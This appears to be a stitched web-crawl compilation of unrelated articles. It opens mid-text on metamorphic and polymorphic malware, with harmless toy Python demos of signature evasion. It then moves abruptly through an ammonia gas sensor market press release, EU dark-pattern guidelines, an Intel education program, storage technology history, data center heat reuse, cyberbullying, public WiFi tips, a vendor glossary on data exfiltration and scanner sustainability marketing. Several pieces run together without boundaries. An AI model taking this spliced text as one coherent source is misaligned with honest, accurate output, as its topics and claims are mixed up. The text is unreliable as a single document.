This type of malware is completely rewritten with each iteration, yet every version functions the same way. The longer the malware stays on a computer, the more iterations and versions it produces, and the more sophisticated those iterations become.
The technologies used by metamorphic malware are sophisticated and complex, which makes it more difficult to detect than polymorphic malware. Techniques used by such malware include register renaming, code permutation, code expansion, code shrinking, and garbage code insertion.
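One of the techniques just listed — garbage code insertion — can be demonstrated harmlessly. The “payload” below is plain arithmetic, not anything malicious; the point is only that splicing no-op filler between real statements gives every copy a different hash while its behavior is unchanged.

```python
import hashlib
import random

# Toy illustration of garbage-code insertion: harmless filler statements
# are spliced between the real ones, so every copy hashes differently
# while computing exactly the same result.

payload = ["x = 2", "y = 3", "result = x * y"]

def mutate(lines, rng):
    out = []
    for line in lines:
        out.append(line)
        out.append(f"_junk = {rng.randrange(10**9)}")  # no-op filler
    return "\n".join(out)

v1 = mutate(payload, random.Random(1))   # two "iterations" of the same code
v2 = mutate(payload, random.Random(2))

def run(src):
    ns = {}
    exec(src, ns)        # safe here: we constructed the source ourselves
    return ns["result"]

print(run(v1), run(v2))                              # same function, same result
print(hashlib.sha256(v1.encode()).hexdigest() ==
      hashlib.sha256(v2.encode()).hexdigest())       # different signatures
```

Real metamorphic engines mutate machine code rather than source strings, but the effect on a signature database is the same.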
Polymorphic malware
Polymorphic malware is also a type of malware that changes its shape and signature. It usually consists of two parts: one changes its shape while the other remains the same, which makes it easier to detect than metamorphic malware.
Usually this type of malware consists of two parts:
- Code that is used to decrypt and encrypt the other part (usually called the VDR: virus decryption routine). This part does not change its shape.
- The core malware code that changes its shape (usually called the EVB: encrypted virus body).
When an infected application launches, the VDR decrypts the encrypted virus body (EVB) so it can execute, then re-encrypts it again. Usually the malware writer uses a randomly generated encryption key in the VDR, so each malware download gets a completely different encrypted virus body.
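The VDR/EVB layout can be illustrated conceptually in Python. This is not functional malware — the “body” is an inert string, and simple XOR stands in for whatever cipher a real sample would use — it only shows why a fresh random key makes every copy’s on-disk bytes differ while the recovered content stays constant.

```python
import os

# Conceptual sketch of the polymorphic VDR/EVB layout described above.
# An inert "body" is stored encrypted under a fresh random key per copy,
# so every copy looks different on disk. XOR stands in for the cipher.

body = b"pretend-virus-body: the logic never changes"

def xor(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def make_copy():
    key = os.urandom(16)          # new random key per download/iteration
    return key + xor(body, key)   # a real VDR would also carry decryptor code

def recover(copy):
    key, enc = copy[:16], copy[16:]
    return xor(enc, key)          # what the decryption routine does at launch

c1, c2 = make_copy(), make_copy()
print(c1 != c2)                            # on-disk bytes (signature) differ
print(recover(c1) == recover(c2) == body)  # recovered content is identical
```

Because the key is regenerated for each copy, a signature computed over one download never matches the next; only the briefly decrypted body stays constant, which is why scanners try to catch such malware in memory or by emulating the decryptor.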
Ammonia gas is a compound of nitrogen and hydrogen and it has a pungent smell and is colourless. It is naturally found in the environment and can also be chemically produced. It is most widely used in fertilizers, refrigerating systems, household cleaners, industrial cleansing agents, and others. Ammonia is flammable in nature and on heating, ammonia containers can explode.
Ammonia gas sensors are being widely used for controlling vehicular and industrial emissions, and for environmental monitoring. Stringent government regulations regarding reduced emissions and pollution control make the deployment of ammonia gas sensors very important. The growing technological advancement in security systems for detecting the presence of various gases is driving the growth of the global market for ammonia gas sensors.
The global ammonia gas sensor market is expected to grow at a CAGR of 6% during the forecast period. The demand for ammonia has increased owing to the need for low-cost nitrogen in the production of nitric acid. This, in turn, has accelerated the demand for ammonia gas sensors. In addition, the use of ammonia in agriculture creates risks for humans and the environment: it can cause various health issues and may even result in death. Thus, ammonia gas sensors are needed so that people can know the level of ammonia in their surroundings and take preventive measures accordingly.
The global ammonia gas sensor market is segmented on the basis of product type and application. Based on product type, it is categorized into fixed-mount and portable types. The portable type has an advantage in that it can be moved and carried anywhere, anytime. The application segment covers agriculture, automotive, commercial, industrial, and others. The automotive sector is experiencing rapid growth due to urbanization, which will result in high pollution emissions, thereby boosting the demand for ammonia gas sensors.
Get a sample copy at: https://www.alltheresearch.com/sample-request/37
The ammonia gas sensor market is segmented by region into North America, Europe, Asia Pacific, Latin America, and the Middle East & Africa. The market for ammonia sensors is expected to witness significant growth in the Asia Pacific region during the forecast period. The rising number of manufacturing hubs and growing industrialization in countries such as China and India are driving the demand for ammonia gas sensors in the APAC region. There are many manufacturers of ammonia gas sensors in the market, such as Aeroqual, Denso, Direct Industry, FIS Inc, Gasvigil Technologies Pvt Ltd., Industrial Scientific Corporation, Invest Electronics Ltd, Sensidyne, and others.
AllTheResearch was formed with the aim of making market research a significant tool for managing breakthroughs in the industry. As a leading market research provider, the firm empowers its global clients with business-critical research solutions. Our study of numerous companies that rely on market research and consulting data for their decision-making made us realise that it’s not just sheer data points, but the right analysis, that creates a difference.
For all your Research needs, reach out to us at:
Address: 39180 Liberty Street Suite 110, Fremont, CA 94538, USA
New guidelines are supposed to help national authorities spot and regulate design-based manipulations.
The European Union's privacy watchdog, the European Data Protection Board (EDPB), adopted a set of guidelines to limit 'dark pattern' infringements on social media.
'Dark patterns' are design techniques used to coerce users into doing what the website wants. For example, a site might present privacy options for web cookies with one option brighter and worded more positively than the others.
EDPB aims to offer practical recommendations to designers and users of social media on how to assess and avoid 'dark patterns' in various interfaces, especially where misleading design collides with the EU's strict privacy regulation, the GDPR.
According to the EDPB, 'dark patterns' may 'cause users to make unintended, unwilling, and potentially harmful decisions regarding the processing of their personal data.'
With design working against users' interests, it's unlikely an average person will make the choices that are best suited for them.
"The guidelines give concrete examples of dark pattern types, present best practices for different use cases, and contain specific recommendations for designers of user interfaces that facilitate the effective implementation of the GDPR," EDPB claims.
Several US states, most notably California and Washington, added provisions on the use of 'dark patterns' in their respective privacy bills.
The misuse of dark patterns varies from annoying to downright dangerous. In some cases, the 'pattern' might lead a user to miss the 'x' on a pop-up ad, while in other cases, users commit to contracts for services they thought were free.
Since 2015, Intel’s Native Coders initiative has provided pathways to computer science for hundreds of Native American high school students through a culturally sensitive curriculum that bridges cutting-edge technology and endangered traditions.
The initiative began as part of Intel’s broader goal to achieve full representation of women and underrepresented minorities in its U.S. workforce by 2020 – which the chip maker achieved last October, two years ahead of schedule. That means that the percentage of women and underrepresented minorities matches the talent pool available for skilled workers in the U.S, according to Intel.
Native Coders launched in 2015 in the Navajo Nation in Arizona at three Navajo high schools. A computer science curriculum was added to the schools’ coursework, and Intel funded the addition of computer science educators and a full computer lab at each site, says Jolene Begay, an engineering technician at Intel who played an integral role in developing the Native Coders program.
Begay herself is Navajo and grew up on a reservation. She knew from the beginning there would be unique challenges bridging the gaps between corporate culture and Navajo culture.
“The Native Coders initiative is very special to me because I’m from that tribe, and technology and Intel have played a huge role in my career. Growing up, I didn’t come from a family of engineers, and I didn’t have that exposure to the field – I wanted to be involved in this because I wanted to develop a pathway for others into this industry,” Begay says. “Because of our history, we’re very protective of our culture, so bringing a big corporation onto the reservation was a huge hurdle. I went, first, to speak to the tribal leaders and talked about the positives and the opportunities available, and because it was brought from someone in the community, it was more easily acceptable.”
Combining tech skills with Navajo culture
Navajo culture is based around family and community and preserving that cultural identity, Begay says, but Navajo culture and technology don’t have to be mutually exclusive.
“A career in computer science offers opportunities to both stay at home and preserve culture while making an impact on the larger world – for these kids, if they have a laptop and the internet, they can be entrepreneurs, they can work remotely, they can help to expand access and opportunities to others in their community,” she says.
In addition to leveraging Begay’s connections with Navajo tribal leaders, Intel approached development, strategy and launch of the program differently by partnering with other organizations such as American Indian Science and Education Society (AISES) and aligning curriculum and strategy with the White House CS4All initiative in 2016, says Rhonda James, senior program manager and head of global diversity and inclusion programs at Intel.
“We didn’t want to do what companies typically do, where we build the strategy, create products and programs, and then onboard everyone else – the top-down approach,” James says. “We wanted to involve the community from the very beginning and hear from them about their challenges and opportunities, so we held a ‘convening.’ We had tribal leaders, non-profits focused on Native Americans; we had students, Intel employees – all sorts of people – come together to talk about the issues and opportunities and what’s next. We brought in AISES, which has an existing curriculum that we integrated and that meets Arizona state educational codes, we brought in the National Center for Women in Technology (NCWIT), and together with all these partners and all this feedback, we created this program.”
The program includes general, standardized curriculum that all students can relate to, but is also highly customizable for different tribal needs, James says. For example, Navajo students can use their technology skills to design weaving patterns and learn how technology can impact design and color process for traditional textiles, says Begay.
“Weaving is very traditional in our culture. Creating the patterns, dyeing and spinning the wool – many of these aspects of creating textiles have traditional cultural processes and meaning. But showing students how math, engineering, [and] computer science can be leveraged in these traditional arts is building a bridge between our traditions and future innovation,” Begay says.
With 573 tribal communities within the U.S., the curriculum developed for the Native Coders initiative can be customized so that all native communities can align their traditions and cultures with STEM, Begay says, and find new ways to integrate the two.
The program is now entering its fourth year, and 2019 will see the Native Coders initiative’s first graduates this spring, says Begay.
“When we first kicked off, we opened up the program only to high school freshmen, so we haven’t yet had a class go through the full three-year program. This year will be our first! We will then have 439 students who’ve completed this program,” she says.
In addition, Intel has launched a $1.37 million scholarship program for Native American students to pursue their undergraduate and graduate degrees in a STEM field, says James, and Intel’s leadership has been touting the program to other industry partners.
“We’ve been encouraging other partners and colleagues in the industry to pursue initiatives like this, but the challenge is in the numbers,” James says. “The representation of Native Americans in STEM is less than 1 percent – what we hear a lot is, ‘Oh, we’ll do a low-touch model because the numbers are so small,’ or ‘Well, we don’t have any Native Americans at our company.’ But regardless of those numbers, this is a valid and valued program, and we want these communities to know that we value them and want to see greater representation! If a company doesn’t have that representation, that isn’t a reason to ignore certain groups – that’s a challenge and an opportunity,” James says. | <urn:uuid:7f60554f-9d58-40da-acb6-ddf18c8f272b> | CC-MAIN-2022-40 | https://www.cio.com/article/219754/intels-native-coders-program-offers-pathway-to-stem-for-native-american-students.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00765.warc.gz | en | 0.960165 | 1,255 | 2.796875 | 3 |
4 Ways Storage Technologies Have Evolved
Like many technologies these days, storage has come a long way. We miss you, floppy disks! Look no further than these four interesting and important ways cloud storage technologies have evolved in the past decade.
The trends in storage we'll highlight are interrelated. They are all consequences, direct or indirect, of Moore's Law: Gordon Moore's observation that the count of transistors on a chip doubled every couple of years, on and on for decades. The exponential growth affected processor power, but also storage density.
Data grows exponentially
"Between the dawn of civilization and 2003, we only created five exabytes; now we're creating that amount every two days. By 2020, that figure is predicted to sit at 53 zettabytes (53 trillion gigabytes) – an increase of 50 times." —Hal Varian, Chief Economist at Google.
The volume of digital data in the world is growing exponentially. Nowadays, most human activities, and nearly all business activities, are mediated by — or at least accompanied by — computers. In the process, individuals and organizations are generating large volumes of data, and we've grown more and more dependent on that data.
From smartphones, to point-of-sale systems, to security cameras, to factory robots, and beyond, there are billions of devices generating and capturing data, which must be transmitted and stored. This need is in a feedback loop with the other trends in storage technology below.
Storage gets denser, cheaper, and more invisible
For many years, consumer storage devices, like the spinning-disk and solid-state storage that an ordinary person might buy, have mushroomed enormously in capacity while becoming remarkably cheaper.
The effects of Moore's Law can be seen in the long-term cost trend for memory. A megabyte cost about $5.2 million in 1960, but by 1980 it was $6,500, then $78 in 1990, $1 in 2000, 16 cents in 2005, 2 cents in 2010, and about half a cent from 2015 onward. And so thumb drives and external USB drives purchased several years ago now look pathetic in their capacity, as well as absurdly expensive.
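To make the trend concrete, here is a small Python sketch (the dollar figures come from the paragraph above; the derived rate is only approximate) that estimates how fast the cost per megabyte has fallen:

```python
# Approximate cost of one megabyte of memory, in dollars, per the figures above.
cost_per_mb = {
    1960: 5_200_000,
    1980: 6_500,
    1990: 78,
    2000: 1.0,
    2005: 0.16,
    2010: 0.02,
    2015: 0.005,
}

def annual_decline(start_year, end_year):
    """Average annual factor by which the cost fell between two years."""
    ratio = cost_per_mb[start_year] / cost_per_mb[end_year]
    years = end_year - start_year
    return ratio ** (1 / years)

# Over 1960-2015, the cost fell by roughly a factor of a billion.
total_drop = cost_per_mb[1960] / cost_per_mb[2015]
rate = annual_decline(1960, 2015)
print(f"Total drop: {total_drop:.1e}x, ~{rate:.2f}x cheaper per year")
```

Running it shows memory becoming roughly 1.5x cheaper every year, sustained for over five decades.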
While consumer storage products have been exploding in capacity, there's been prodigious growth in the storage we don't see: the storage all around us, tucked away inside smartphones, game consoles, cars, appliances, building systems, industrial systems — and in distant data centers.
Storage moves further away
You likely carry at least a few dozen gigabytes around in your pocket (for watching cat videos), but the trend has been for the largest pools of storage to move further and further away from processors — and users.
Storage devices were originally attached directly to a server, or a cluster of servers: Direct Attached Storage (DAS). In data centers, that arrangement has been supplemented by storage accessible over the LAN. Storage devices on the network can be shared, utilized more efficiently, and scaled in capacity, and their data can be shared more easily among servers.
Network Attached Storage (NAS) is a specially designed file server on an existing LAN. NAS devices export a filesystem view (folders and files) to their clients. Storage Area Networks (SANs) typically use dedicated networking hardware — often Fibre Channel — to provide a shared path among servers and storage devices. SAN devices usually export a block view (like disk blocks) to their clients. More recent SAN variations can also run over ordinary networks, such as high-speed Ethernet (FCoE) or IP (SAN over IP, iSCSI).
Storage in the cloud
As the largest pools of storage move further away, transitioning to the cloud is the next step.
Cloud-based storage provides enormous volumes of storage managed and monitored by a cloud provider that guarantees a degree of availability and durability hard to achieve on your own. Sharing storage with other customers generally is a win in both cost and agility.
The cloud is founded on virtualization. Cloud storage is implemented on physical devices in multiple locations but aggregated into pools that are invisibly carved up among customers, hiding the particulars of the underlying hardware. The cloud provider gives you a simplified management interface and an automated process to fulfill requests, so you can rapidly create and provision virtual resources from the shared pools, paying as you go.
Object-based storage is a storage technology particularly suited to the immense distributed volume of data in the cloud. Rather than appearing to be disk blocks (like SAN) or a filesystem of folders and files (like NAS), object storage exposes binary objects: blobs that contain a file's contents, its metadata (like owner, date, etc.), and other attributes. The objects are stored in a flat list, indexed by object IDs (OIDs) that are derived from the file's contents and other attributes. The flat address space of OIDs works well for scalability and geographic distribution.
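To illustrate the idea (this is a toy model, not any vendor's actual implementation), an object store can be pictured as a flat map from content-derived OIDs to blobs and their metadata:

```python
import hashlib
import json

class ToyObjectStore:
    """A minimal, illustrative object store: a flat OID -> object map."""

    def __init__(self):
        self._objects = {}

    def put(self, data: bytes, metadata: dict) -> str:
        # Derive the OID from the object's contents and metadata,
        # as described above, so identical objects get identical IDs.
        digest = hashlib.sha256(data + json.dumps(metadata, sort_keys=True).encode())
        oid = digest.hexdigest()
        self._objects[oid] = {"data": data, "metadata": metadata}
        return oid

    def get(self, oid: str) -> dict:
        return self._objects[oid]

store = ToyObjectStore()
oid = store.put(b"cat video bytes", {"owner": "alice", "type": "video"})
print(oid[:12], store.get(oid)["metadata"]["owner"])
```

Because the namespace is a single flat list of IDs rather than a directory tree, it can be partitioned and replicated across machines and regions without restructuring, which is what makes object storage scale so well.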
Amazon's cloud offering, Amazon Web Services (AWS), offers a variety of storage options, and we can see the storage technologies above reflected there. Elastic Block Store is block-oriented, like SAN. Elastic File System is file system-oriented, like NAS. And Simple Storage Service (S3) is an object-based storage system.
Evolution of storage
Storage in the cloud will continue to be an occasion for innovation. Big data science and artificial intelligence both need massively parallel processing of huge volumes of data, and cloud services will need to grow to support that rapid change.
Meanwhile, with gigabytes in our pockets and the cloud accessible, we won't miss our floppy disks… much. | <urn:uuid:4dc6fa00-ac9b-40b5-89da-ddae9d3f8624> | CC-MAIN-2022-40 | https://www.cbtnuggets.com/blog/technology/data/4-ways-storage-technologies-have-evolved | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00165.warc.gz | en | 0.940606 | 1,144 | 2.6875 | 3 |
For every knock at data center energy waste, there’s two examples of innovative thinking and recycling going on. One of the latest design trends is using waste heat from a data center hot aisle in a district heating system for nearby offices and condos. Canada’s Telus Corp. provides the latest example of this, tapping waste heat from its data center in Vancouver to power heating and cooling systems of its adjacent $750 million mixed-use Telus Garden development.
FortisBC will operate a regulated utility within Telus Garden, in partnership with Telus and Westbank, creating a District Energy System (DES).
"The TELUS Garden District Energy System represents a shift in how we think about and utilize energy," said Andrea Goertz, senior vice-president of TELUS Strategic Initiatives and Communications. "By recovering energy that would normally be lost and putting it to good use, we are innovating through design to create one of the most environmentally-friendly urban communities in North America."
Provides 80 Percent of Energy for Tower
Waste heat from the data center and the cooling system of Telus’ Robson Street headquarters will provide 80 percent of the energy needed to heat and cool the development’s one million square feet of space, as well as heat domestic hot water for both of its towers. Capturing and recycling the waste heat will help reduce carbon dioxide emissions by one million kilograms a year.
"Our collaboration with Westbank and TELUS is an example of the innovation and energy savings available to customers using district energy systems,” said Doug Stout, vice-president of Energy Solutions and External Relations for FortisBC, which is featured in a video presentation about the DES.
The DES will help to reduce overall energy use and protect residents and employers from rising energy costs in the future. The British Columbia Utilities Commission has approved the construction of the TELUS DES system by the partnership, and for FortisBC to own and operate the energy system once commissioned.
This is one of the first systems in Vancouver to use waste heat from a neighboring site to heat and cool a new development. But it isn’t the first worldwide.
- Across the pond in London, Telehouse began using excess heat in a Docklands data center to heat nearby homes and businesses in 2009. It was the most ambitious effort at the time to reuse the excess heat from data centers.
- IBM has a data center in Switzerland that warms a nearby community swimming pool.
- An unusual concept was put forth by researchers from Microsoft and the University of Virginia in a paper published in 2011. It suggested that large cloud infrastructures could be distributed across offices and homes, which would use exhaust heat from cabinets of servers to supplement (or even replace) their on-site heating systems.
Interested in getting in on this heat recycling love fest? Check out DCK’s Guide to Heat Recycling.
A quick peek at young students’ Facebook profiles and a common trend appears: mean statuses written about fellow classmates, with endless comments from other students who are in agreement.
Cyberbullying has been on the rise since the emergence of online networking sites. It can lead to depression and, in some cases, suicide.
The question that always comes up is where were the parents? Parents are now faced with the task of teaching their kids how to behave online.
Common Sense Media is a nonprofit organization that has created a website that allows parents to do just that. It is a tool that helps teach parents, teachers, and students the dangers of online bullying. It teaches students how to avoid it, and how to make a stand when they see others doing it. The website tries to address students based on their age level, so there is a separate toolkit for elementary school, middle school, and high school.
It’s not always possible for teachers to monitor students, so it is important that teachers and parents are both involved in the learning process. Unless they are Facebook friends with their kids and students, they often have no way of knowing that online bullying is going on. At least now they can prevent the problem before it happens. | <urn:uuid:69b66e74-c3dd-4353-bdf3-2c2bea0aec94> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/taking-a-stand-against-cyber-bullying | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00165.warc.gz | en | 0.980938 | 249 | 3.484375 | 3 |
Public WiFi is available in more places than ever before. You can log on while at the local coffee shop, doctor’s office, on the train, and at the airport. Local governments and cable companies are even starting to offer free WiFi in some locations.
The convenience is undeniable, especially for the ability to work remotely, but this freedom to connect can also present a security risk if you don’t know who else is connecting to the same public WiFi network. By surfing the web for free without adequate protections, you could be allowing hackers on the same network to intercept your data — essentially “hijacking” it — or put your device itself at risk.
These risks don’t mean that you should stop using public WiFi entirely. There are immense benefits to being able to connect to work or home on the go. Before you plug in the free password at your favorite coffee shop, it’s worth taking a few simple steps to protect yourself from these types of attacks and ensure your personal or corporate data is kept secure.
Verify your network
Start by verifying the network itself. It’s easy for an attacker to create a bogus WiFi network, perhaps with a name that sounds like the one you may be looking for, to ensnare victims. A straightforward way to verify the network is to check with an employee of the establishment that you’re connecting to the right one before you enter the password, or even to compare its IP address.
It’s also always better to stick with the most reputable option — maybe the Starbucks WiFi instead of a random public network that may happen to be available, but that you aren’t sure of the source. Also, before you hit “Agree,” it’s worth reading through the Terms and Conditions to understand how the vendor is using your browsing data.
Utilize security tools
For an added level of protection, many users opt to use a virtual private network (VPN) when connecting to free public WiFi. A VPN works by extending a private network across a public network, essentially replicating a direct connection to the private network. It can also, in some cases, layer on additional security protections like encryption. What does this all mean? Essentially, while you’re connecting to a public WiFi network, you’re protected like it’s a private one.
There are many choices for VPNs out there. It’s worth taking the time to find a reputable choice, as some are more secure than others. Check out an independent review site or ask a security professional which one they would recommend before purchasing.
Stay aware of your surroundings
When surfing the internet, try to browse with “HTTPS” sites, which means they are encrypted and therefore better secured against attack (instead of “HTTP” sites, which are unprotected). Try also to avoid or turn off file sharing — such as AirDrop or other similar file and print sharing services — which allow other nearby users or users on the same network to easily share potentially malicious files.
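As a small illustration in Python, the standard library's `ssl` module shows what "better secured" means in practice: a default TLS context requires certificate validation and hostname checking, which is what protects HTTPS traffic from on-network eavesdroppers (the URLs below are just examples):

```python
import ssl
from urllib.parse import urlparse

def is_https(url: str) -> bool:
    """True only for URLs that use the encrypted HTTPS scheme."""
    return urlparse(url).scheme == "https"

# A default SSL context insists on validating the server's certificate
# chain and hostname before any data is exchanged.
context = ssl.create_default_context()

print(is_https("https://bank.example.com/login"))  # True
print(is_https("http://bank.example.com/login"))   # False
print(context.verify_mode == ssl.CERT_REQUIRED)    # True
print(context.check_hostname)                      # True
```

A browser performs the same checks automatically; the padlock icon and "https://" prefix are the visible evidence.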
Even with all these protections in place, it’s always best practice to assume that attackers are watching. Consider waiting until you get home before logging into your bank or sensitive corporate accounts or even entering information like your email, credit card account or social security number.
These steps are by no means comprehensive, but they can help make an inherently insecure connection, like public WiFi, a bit more secure.
That way, you can enjoy the benefits of connection on the go, without the worry of compromising your personal or corporate data. | <urn:uuid:1bcae59d-9e29-4272-8a21-c59680f21cda> | CC-MAIN-2022-40 | https://dartmsp.com/using-public-wifi-heres-how-to-protect-yourself/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00165.warc.gz | en | 0.946359 | 736 | 2.734375 | 3 |
Data exfiltration is the unauthorized transfer of data from a computer or other device. It can be conducted manually via physical access to a computer or as an automated process using malicious programming on the internet or a network.
Data exfiltration is also known as: data extrusion, data exportation, data leaks, data leakage, data loss, and data theft.
While data exfiltration attacks can be carried out by malicious actors, it can also happen due to unintentional human error. There are three common ways data exfiltration can occur:
- External attack: The most common source of data loss is email, and phishing is the most common technique used. These attacks are typically targeted, with the objective of gaining access to a network or machine to locate and copy specific data.
- Accidental loss: Employees and business partners may accidentally be responsible for data exfiltration due to negligence or oversight. For example, an employee may send out sensitive company data to an incorrect email address or copy a confidential document to a personal device, which is against company security policies.
- Disgruntled insider: In some rare cases, company insiders may intentionally copy or email sensitive data to cause harm. This can be done by an unhappy or former employee who still has access to company systems.
According to an annual IBM report, the average total cost of a data breach was $3.92 million in 2019. For some industries, such as healthcare, this number can almost double. Data breaches in the United States were the most expensive, with an average cost of $8.19 million. The average size of the data breach was 25,575 records.
Data loss can lead to financial losses and have a long-lasting impact on an organization’s reputation.
There are a number of strategies that organizations can put in place to prevent data exfiltration:
- Deploy data loss prevention (DLP). DLP is a set of technology and business policies to make sure end users do not send sensitive or confidential data outside the organization. A DLP system scans all outbound email to look for pre-determined patterns that might indicate sensitive data, including credit card numbers, Social Security numbers, and HIPAA medical terms. Messages containing this type of sensitive data are automatically encrypted or blocked from being sent out, depending on the policy.
- Set up encryption policies. Establish policies to encrypt sensitive data while it’s in transit. Encrypted messages cannot be intercepted or tampered with by hackers.
- Prevent phishing attacks. Phishing attacks are commonly used by malicious actors in data exfiltration attacks. Investing in good anti-phishing technologies that will detect and block phishing attacks is a must to prevent data loss.
- Revoke data access for former employees and contractors. Organizations must stay on top of who has access to their sensitive data and revoke access to employees or partners as soon as a business relationship is over. Leaving access open for even an extra day may cause a serious security breach.
- Educate your employees. Invest in educating your users on how to recognize phishing attacks that may lead to data exfiltration and how to follow internal policies on data security. The number one cause of data loss is human error, so make sure your employees understand how to keep company data secure.
- Back up your data. Unfortunately, some organizations may face a security breach that will lead to data loss. It’s important for organizations to be prepared and back up all of their data so they can quickly restore any lost data without a negative impact on their business operations and productivity.
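To sketch the pattern-scanning step of the first strategy above (DLP), here is a deliberately simplified Python example; real DLP products use far more sophisticated, validated detection rules:

```python
import re

# Hypothetical patterns for illustration only; production DLP systems
# ship vendor-maintained, validated rule sets.
SENSITIVE_PATTERNS = {
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

def scan_outbound(message: str) -> list:
    """Return the names of sensitive-data patterns found in a message."""
    return [name for name, pattern in SENSITIVE_PATTERNS.items()
            if pattern.search(message)]

hits = scan_outbound("Customer SSN is 123-45-6789, card 4111 1111 1111 1111")
print(hits)  # -> ['credit_card', 'ssn']; policy then encrypts, quarantines, or blocks
```

In a real deployment, a non-empty result would trigger the configured policy action (encrypt, quarantine, or block) before the message ever leaves the organization.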
How Barracuda Can Help
Barracuda Email Protection scans your email traffic to block malicious attachments and URLs, including those in phishing and spear-phishing emails. It also uses advanced analysis to spot typo-squatting, domain impersonation, and other signs of phishing.
Barracuda data loss protection and email encryption keep sensitive data—such as credit card numbers, Social Security numbers, HIPAA data, and more—from leaving your organization. Content policies can automatically encrypt, quarantine, or even block certain outbound emails based on their content, sender, or recipient.
Barracuda Email Protection also includes Impersonation Protection, which uses a powerful artificial intelligence engine that learns organizations’ unique communications patterns to identify and block real-time spear-phishing attempts. By finding anomalous signals in incoming messages, Impersonation Protection can prevent phishing and social-engineering attacks before they strike.
It’s important to train users to spot potential phishing emails and delete them. Users should err on the side of caution and confirm the authenticity of any unexpected email by contacting the apparent sender. Barracuda Security Awareness Training uses advanced training and simulation to measure your vulnerability to phishing emails and teach users how to avoid becoming victims of data theft, malware, and ransomware.
Barracuda Backup operates as the first line of defense against data loss during catastrophic system failure. By seamlessly integrating all your data—whether physical, virtual, or in the cloud—Barracuda Backup is the optimal solution for data protection in the modern age.
Have questions or want more information about Data Exfiltration? Get in touch right now! | <urn:uuid:49854ebf-510a-4294-94da-11d6581d98ae> | CC-MAIN-2022-40 | https://www.barracuda.com/glossary/data-exfiltration | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00165.warc.gz | en | 0.924424 | 1,079 | 3.65625 | 4 |
Reduce waste and resource consumption by digitizing paper records and workflows.
Environmental sustainability has become an important focus of business planning and operations worldwide.
According to results from a 2020 survey by KPMG, 96% of the largest 250 companies in the world (the G250) now report on their sustainability performance using a variety of metrics. The movement toward more socially and ecologically mindful business has even spawned a set of corporate investment guidelines known as Environmental, Social, and Governance (ESG) criteria.
Companies are becoming more transparent with regard to sustainable and socially responsible practices, and guidelines like ESG make it easier for stakeholders and investors to evaluate a company’s impact on the world. ESG and other sustainability programs promote opportunities to make specific technology decisions that can go a long way toward meeting corporate sustainability goals.
Document scanners play an important role in these efforts.
For example, by incorporating document scanners into business workflows, companies can significantly reduce paper usage and waste. When hard copy documents are scanned, the new digital format can be easily distributed to others; it’s no longer necessary to make paper copies to guarantee access to information already in print.
In addition, reducing the need to print and copy paper documents saves a significant amount of energy, and using less ink and toner provides a huge benefit in terms of financial and environmental costs. It’s also important that business leaders choose sustainably manufactured scanners and follow responsible end-of-life recycling practices for their hardware.
Paper takes a major toll on the environment—not just in the amount of lumber cut down every year, but also in the staggering amount of energy it takes to process wood for retail and later break it down after it has been discarded. In 2018, the Environmental Protection Agency (EPA) found that the largest component of municipal solid waste was paper and cardboard, approximately a fourth of the total material reported.
The EPA also notes that approximately 375 million toner and ink cartridges are discarded and sent to landfills each year. This is especially harmful to the environment because cartridges are made of hard plastics and fortified with heavy metals. Also, ink and toner contain chemicals that are known to be hazardous when they seep into soil. Any effort to reduce the usage of these materials provides a measurable environmental benefit.
Going paperless also saves companies a lot of money, and it helps keep business operations secure, efficient, and organized.
Making the shift to paperless workflows significantly reduces electricity usage and costs over time. It doesn’t take nearly as much energy to keep a computer running as it does to output documents from a printer.
According to the Energy Use Calculator, a typical inkjet printer requires about 30 to 50 watts of power during printing, and 3 to 5 watts in standby mode. However, businesses typically use heavy-duty printers and large multifunction devices, which use about 300 to 500 watts of power while printing, and 30 to 50 watts in standby mode.
Even when an office printer isn’t in use, it still draws energy. And because businesses typically create several copies of certain documents, a large amount of electricity is spent for the same document. This inefficiency can be eliminated by going paperless and using scanners to digitize important corporate documents.
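A back-of-the-envelope Python calculation, using the wattage figures above with assumed (purely illustrative) usage hours and an assumed electricity price, shows how the inefficiency adds up across a fleet of printers:

```python
def annual_kwh(active_watts, standby_watts, active_hours_per_day, days=365):
    """Energy per device per year, counting the remaining hours as standby."""
    standby_hours = 24 - active_hours_per_day
    daily_wh = active_watts * active_hours_per_day + standby_watts * standby_hours
    return daily_wh * days / 1000  # watt-hours -> kilowatt-hours

# Hypothetical office: ten heavy-duty printers, each printing at 400 W for
# one hour a day and idling at 40 W the rest, at an assumed $0.15 per kWh.
per_printer = annual_kwh(400, 40, 1)
fleet_cost = 10 * per_printer * 0.15
print(f"{per_printer:.0f} kWh per printer, ~${fleet_cost:.0f}/year for the fleet")
```

Notably, in this sketch standby power accounts for more than two thirds of each printer's annual consumption, energy a paperless workflow avoids entirely.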
It’s important to choose document scanners and other products from companies that value corporate responsibility and that make environmentally conscious decisions. In 2019, Kodak Alaris completed a progress review of a 5-Year Environmental Plan that started in 2015. Our achievements include high levels of EPEAT® certification across our product line.
For all of our document scanners and services, we use sustainable and/or recycled materials, and our products are Electronic Product Environmental Assessment Tool (EPEAT®) certified and Energy Star®-certified. By choosing Kodak Alaris for your document scanning, you’ll always know you’re making an environmentally responsible decision.
EPEAT is a worldwide rating system managed by the Green Electronics Council that acknowledges the environmental performance and full lifecycle of electronic products, from the time of their design and production to their energy use and recycling.
The EPEAT criteria rank products as Bronze, Silver, or Gold. Kodak Alaris has a total of 33 EPEAT-registered scanners, with 100% meeting the Silver criteria as of 2019 and 12 scanners meeting the Gold standard as of 2021. This is more than any other manufacturer in the industry.
